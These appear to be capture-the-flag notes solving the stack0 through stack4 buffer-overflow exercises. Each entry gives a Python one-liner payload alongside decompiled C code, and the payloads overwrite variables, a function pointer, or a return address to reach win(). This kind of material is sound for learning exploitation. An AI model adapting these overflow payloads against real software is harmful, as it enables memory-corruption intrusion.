-----------------------------------------------------------------------
pwnable
-----------------------------------------------------------------------
stack0:print "A"*64+"1"

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax@2
  int v4; // [sp+1Ch] [bp-44h]@1
  int v5; // [sp+5Ch] [bp-4h]@1

  v5 = 0;
  gets((char *)&v4);
  if ( v5 )
    result = puts("you have changed the 'modified' variable");
  else
    result = puts("Try again?");
  return result;
}
-----------------------------------------------------------------------
stack1:./stack1 $(python -c 'print "A"*64+"\x64\x63\x62\x61"')

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax@4
  int v4; // [sp+1Ch] [bp-44h]@3
  int v5; // [sp+5Ch] [bp-4h]@3

  if ( argc == 1 )
    errx(1, "please specify an argument\n");
  v5 = 0;
  strcpy((char *)&v4, argv[1]);
  if ( v5 == 1633837924 )
    result = puts("you have correctly got the variable to the right value");
  else
    result = printf("Try again, you got 0x%08x\n", v5);
  return result;
}

-----------------------------------------------------------------------
stack2:
GREENIE=$(python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"')


int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax@4
  int v4; // [sp+18h] [bp-48h]@3
  int v5; // [sp+58h] [bp-8h]@3
  char *v6; // [sp+5Ch] [bp-4h]@1

  v6 = getenv("GREENIE");
  if ( !v6 )
    errx(1, "please set the GREENIE environment variable\n");
  v5 = 0;
  strcpy((char *)&v4, v6);
  if ( v5 == 218762506 )
    result = puts("you have correctly modified the variable");
  else
    result = printf("Try again, you got 0x%08x\n", v5);
  return result;
}
-----------------------------------------------------------------------
stack3:
0x08048424 : win()
(python -c 'print "A"*64+"\x24\x84\x04\x08"')|./stack3


int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax@1
  int v4; // [sp+1Ch] [bp-44h]@1
  int (*v5)(void); // [sp+5Ch] [bp-4h]@1

  v5 = 0;
  result = (int)gets((char *)&v4);
  if ( v5 )
  {
    printf("calling function pointer, jumping to 0x%08x\n", v5);
    result = v5();
  }
  return result;
}

-----------------------------------------------------------------------
stack 4
0x80483f4 <win>

(python -c 'print "A"*72+"xxxx"+"\xf4\x83\x04\x08"')|./stack4

